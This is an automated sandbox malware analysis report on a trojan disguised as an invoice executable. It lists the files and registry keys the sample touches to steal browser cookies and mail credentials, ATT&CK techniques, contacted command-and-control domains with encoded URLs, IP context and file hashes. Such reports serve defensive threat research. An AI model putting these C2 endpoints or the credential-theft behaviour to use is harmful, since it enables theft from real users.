Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\replace.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Source: Revised Invoice H000127896.exe	Binary or memory string: WIN_XP
Source: Revised Invoice H000127896.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Revised Invoice H000127896.exe	Binary or memory string: WIN_XPe
Source: Revised Invoice H000127896.exe	Binary or memory string: WIN_VISTA
Source: Revised Invoice H000127896.exe	Binary or memory string: WIN_7
Source: Revised Invoice H000127896.exe	Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_004652BE
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00476619
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_0046CEF3

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	16 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Revised Invoice H000127896.exe	42%	ReversingLabs	Win32.Trojan.Autoitinject
Revised Invoice H000127896.exe	100%	Avira	HEUR/AGEN.1321293
Revised Invoice H000127896.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://www.07t90q.vip/9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw==	0%	Avira URL Cloud	safe
http://www.5oxzis.top/6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XX	0%	Avira URL Cloud	safe
http://www.kuaimaolife.shop/j39u/	0%	Avira URL Cloud	safe
http://www.5oxzis.top/6tyq/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.nodigitalsmoke.org/pnbu/	0%	Avira URL Cloud	safe
http://www.kuaimaolife.shop/j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XX	0%	Avira URL Cloud	safe
http://www.concept.pink/4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XX	0%	Avira URL Cloud	safe
http://www.nodigitalsmoke.org	0%	Avira URL Cloud	safe
http://www.concept.pink/4yov/	0%	Avira URL Cloud	safe
https://www.strato.de	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
07t90q.vip	3.33.130.190	true	false	unknown
nodigitalsmoke.org	3.33.130.190	true	false	unknown
concept.pink	217.160.0.27	true	false	unknown
www.kuaimaolife.shop	38.55.251.233	true	false	unknown
www.5oxzis.top	20.2.217.253	true	false	unknown
www.concept.pink	unknown	unknown	true	unknown
www.nodigitalsmoke.org	unknown	unknown	true	unknown
www.07t90q.vip	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.07t90q.vip/9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw==	false	Avira URL Cloud: safe	unknown
http://www.kuaimaolife.shop/j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XX	false	Avira URL Cloud: safe	unknown
http://www.nodigitalsmoke.org/pnbu/	false	Avira URL Cloud: safe	unknown
http://www.5oxzis.top/6tyq/	false	Avira URL Cloud: safe	unknown
http://www.5oxzis.top/6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XX	false	Avira URL Cloud: safe	unknown
http://www.kuaimaolife.shop/j39u/	false	Avira URL Cloud: safe	unknown
http://www.concept.pink/4yov/	false	Avira URL Cloud: safe	unknown
http://www.concept.pink/4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XX	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.nodigitalsmoke.org	MUjPkRkjOWKkX.exe, 00000007.00000002.3292411346.0000000001275000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.strato.de	MUjPkRkjOWKkX.exe, 00000007.00000002.3293199751.00000000035D6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
217.160.0.27	concept.pink	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
20.2.217.253	www.5oxzis.top	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
38.55.251.233	www.kuaimaolife.shop	United States	174	COGENT-174US	false
3.33.130.190	07t90q.vip	United States	8987	AMAZONEXPANSIONGB	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520359
Start date and time:	2024-09-27 09:06:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Revised Invoice H000127896.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@7/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 52 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MUjPkRkjOWKkX.exe, PID 3576 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
VT rate limit hit for: Revised Invoice H000127896.exe

Simulations

Behavior and APIs

Time	Type	Description
03:08:19	API Interceptor	722258x Sleep call for process: replace.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
217.160.0.27	hesaphareketi-01.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.austintrafficlawyer.com/ac9t/?wT7P=BSX0DHFCkeRuIuC9aNIxPjQAkc6OMQBOI5VXSM1sJH3dc8P1lqyosRwwP84ABr/cxKegDc3ylA7Q6LIOUWXqfoMCS4X8uyDH8g==&Ahm=OJYxThc8VTyL_TWP
	Antndte.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.austintrafficlawyer.com/3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1
	27112023110107pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.austintrafficlawyer.com/iv0r/?cHm4=NW3zugcUREcol4uDaFNo/hQtWcWVL6vHACe7Dopasm3sBm0TPJr15qVO75z3TpGwI48xhkksmXuol2/YLEBTMXnEJLOTbwSo8g==&vnkds=VfPlP
	PAGAMENTO_INV-85732.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.austintrafficlawyer.com/cvps/?-Lkxp=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&ojQxW=_LZhZtRhEB2XP
	INV#761538.exe	Get hash	malicious	FormBook	Browse	www.austintrafficlawyer.com/cvps/?pf5=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&kDuhz=t6NP562HYH_
	Document.exe	Get hash	malicious	FormBook	Browse	www.austintrafficlawyer.com/cvps/?Tb-PA8s8=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&0H=BrFhG8npvv
	DbkrlzhE3S.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cloudninemodels.co.uk/ks01/?bN6=Dtldzzl&oV0LWR=HXS6Dgx9Q88pip/zEWSWLsHrn6Z0ieZrAS1SZp7em4AQeDsYfhUH5nTmvgpC6C2eYvMv
	tGawAEY26l.exe	Get hash	malicious	Grandcrab, Gandcrab	Browse	lucides.co.uk/
	rl86XSdHhM.exe	Get hash	malicious	Grandcrab, Gandcrab	Browse	lucides.co.uk/
20.2.217.253	Shipping document_pdf.exe	Get hash	malicious	FormBook	Browse	www.ooukqu.top/cidd/
20.2.217.253	New order.exe	Get hash	malicious	FormBook	Browse	www.ooukqu.top/cidd/
3.33.130.190	shipping notification_pdf.exe	Get hash	malicious	FormBook	Browse	www.consultarfacil.online/f1ix/
	PO-78140924.BAT.PDF.exe	Get hash	malicious	FormBook	Browse	www.linkwave.cloud/al6z/
	NVOICE FOR THE MONTH OF AUG-24.exe	Get hash	malicious	FormBook	Browse	www.o731lh.vip/2mtz/
	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	www.airtech365.net/87wq/
	H9DsG7WKGt.exe	Get hash	malicious	FormBook	Browse	www.wirewizardselectric.net/btrd/?OXxH-=4g1xeR5Sr0O5KVFc15zB56K+BPAX9uki7kKu7P5TG8qPREbIOpOex+bABSY3j4XKcAWB&t8l4=FrILp2Q
	eMoS6hG54p.exe	Get hash	malicious	FormBook	Browse	www.xmentorgroup.com/btrd/?PL=UYDnSobQX5O+UDHC89bcJt5KVoSCT9YF2HLfXae5rEf1x05YiJjvSBJ7kWs5TcoT1iKc&QZ0=fjlpir7xm81xV2
	CITA#U00c7#U00c3O.exe	Get hash	malicious	FormBook	Browse	www.omexai.info/7xi5/
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.techtalks.live/bopi/?EnAHS=ByUa8OodiJXTyccBcTlBSWluyrmxCMFqSamo3/fZr1sZUY0l87vOSnRQaUoYZRNWeWFC&0T5=UL08qvZHLtV
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.analyticalmkr.com/0vp1/
	rP0n___87004354.exe	Get hash	malicious	FormBook	Browse	www.linkwave.cloud/al6z/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ONEANDONE-ASBrauerstrasse48DE	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	74.208.236.183
	http://hye.com.mx	Get hash	malicious	Unknown	Browse	82.165.213.220
	PO For Bulk Order.exe	Get hash	malicious	FormBook	Browse	217.160.0.231
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	74.208.236.183
	r8x1WvSkbWSUjXh6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.165.67.102
	http://pub-445e7cdb51914c22986bb9246f7fa359.r2.dev/webmailionoss.html	Get hash	malicious	HTMLPhisher	Browse	74.208.255.201
	2240902473.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.165.67.103
	ZcH50SI4q45Dtpf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.165.67.118
	Petronas quotation request.exe	Get hash	malicious	FormBook	Browse	74.208.236.183
	Quotation #10091.exe	Get hash	malicious	FormBook	Browse	217.160.0.10
COGENT-174US	https://tiktomallapp.top/	Get hash	malicious	Unknown	Browse	149.115.248.79
	shipping notification_pdf.exe	Get hash	malicious	FormBook	Browse	38.180.87.102
	http://rmdown.downrenminbank.cc/	Get hash	malicious	Unknown	Browse	149.104.35.170
	http://v884.cc/	Get hash	malicious	Unknown	Browse	154.55.135.62
	http://hbyczyz.com/xrr	Get hash	malicious	Unknown	Browse	38.54.26.75
	http://aprackspace.serveusers.com/	Get hash	malicious	Unknown	Browse	143.244.221.78
	https://telegram.tikkf.top/	Get hash	malicious	Unknown	Browse	38.45.123.42
	http://rmdown.newrenminbankcn.cc/	Get hash	malicious	Unknown	Browse	149.104.35.171
	http://pldw.peoplebankweb.cc/	Get hash	malicious	Unknown	Browse	149.104.35.171
	http://web.teleglams.top/	Get hash	malicious	Unknown	Browse	154.44.30.138
AMAZONEXPANSIONGB	http://home-103607.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	http://home-101829.weeblysite.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	http://sky-102142.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	http://bt-109018.weeblysite.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	http://shaw-107439.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	https://bt-106726.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	https://btyxqgg107999.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	3.33.220.150
	https://btinternet-108597.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	https://hk668.cc/	Get hash	malicious	Unknown	Browse	3.33.165.22
	https://shaw-104990.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
MICROSOFT-CORP-MSN-AS-BLOCKUS	http://home-103607.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10
	http://www.ysb238.cc/	Get hash	malicious	Unknown	Browse	20.239.97.157
	http://home-101829.weeblysite.com/	Get hash	malicious	Unknown	Browse	150.171.27.10
	http://sky-102142.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10
	http://bt-109018.weeblysite.com/	Get hash	malicious	Unknown	Browse	150.171.28.10
	http://shaw-107439.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10
	https://bt-106726.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10
	https://btinternet-102233.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10
	http://currentlyatt49009new.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10
	https://btyxqgg107999.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	150.171.28.10

Process:	C:\Windows\SysWOW64\replace.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\niellists

Download File

Process:	C:\Users\user\Desktop\Revised Invoice H000127896.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.993932084278217
Encrypted:	true
SSDEEP:	6144:QNOEaaVVZbXp0w8K2ICbwF5pNWhSEZhnHrJj/CG301AmVcUggR:sIaVVZtCZ25f25HHg8/mVpggR
MD5:	721D8CDD5E81BBB8594BA631D86D7220
SHA1:	739CFE60A6320736B28DCC21D92A7A68D3888521
SHA-256:	F728B6518839BE49AEC234D5A08AED26C5AC56FF7C6D1F73C5D6A685558B5CA6
SHA-512:	6805FD90FB939C8CD82F2CF98C529C01AF79A96A57A57B8F05E0E5522E8219F63037A2F8B21A0482927FAE422DA5855AEA33F0FA455668ED2F8CCC620F7B720D
Malicious:	false
Reputation:	low
Preview:	.....Z8KJ..E..s.HK...F\...JIJYLPKISOLHHWJVWETZ8KJIJYLPKI.OLHFH.XW.]...K..x.8":s?>'/%+;w&54V$>i(<l">'s&"h...v:*0?.FGCnYLPKISO5IA.w60.i:_.w)-.V..i/+.R..k%3."..v9+.. 0'q(/.JVWETZ8K..JY.QJI)...HWJVWETZ.KHHAXGPK.WOLHHWJVWE.N8KJYJYL0OISO.HHGJVWGTZ>KJIJYLPMISOLHHWJ6SETX8KJIJYNP..SO\HHGJVWEDZ8[JIJYLP[ISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPe=678HHW..SETJ8KJ.NYL@KISOLHHWJVWETZ.KJ)JYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJIJYLPKISOLHHWJVWETZ8KJI

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.506811506149916
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Revised Invoice H000127896.exe
File size:	1'379'361 bytes
MD5:	2a489cab1a6113a0f082d8bfee40ead9
SHA1:	9d422436b62b0afc1c4a24295940ef93724a1580
SHA256:	3f92b6ed5e7ebacc4f0039ca5fcbdd19d4690ca3fd0b73dc2c9e2df580669e6f
SHA512:	34f0097329404c11d6858f04a96f52eed399842d27885d38e89fb46ad2df9602854eec068adc6681bc61715468fe12a5cc741cf17cc8300685235214d781dd96
SSDEEP:	24576:/RmJkcoQricOIQxiZY1iaIIJn2MjD6cjfB8tAq3LhWcTh5b6rTUd97SX:UJZoQrbTFZY1iaIKTv6cDYAzcNt6sd9E
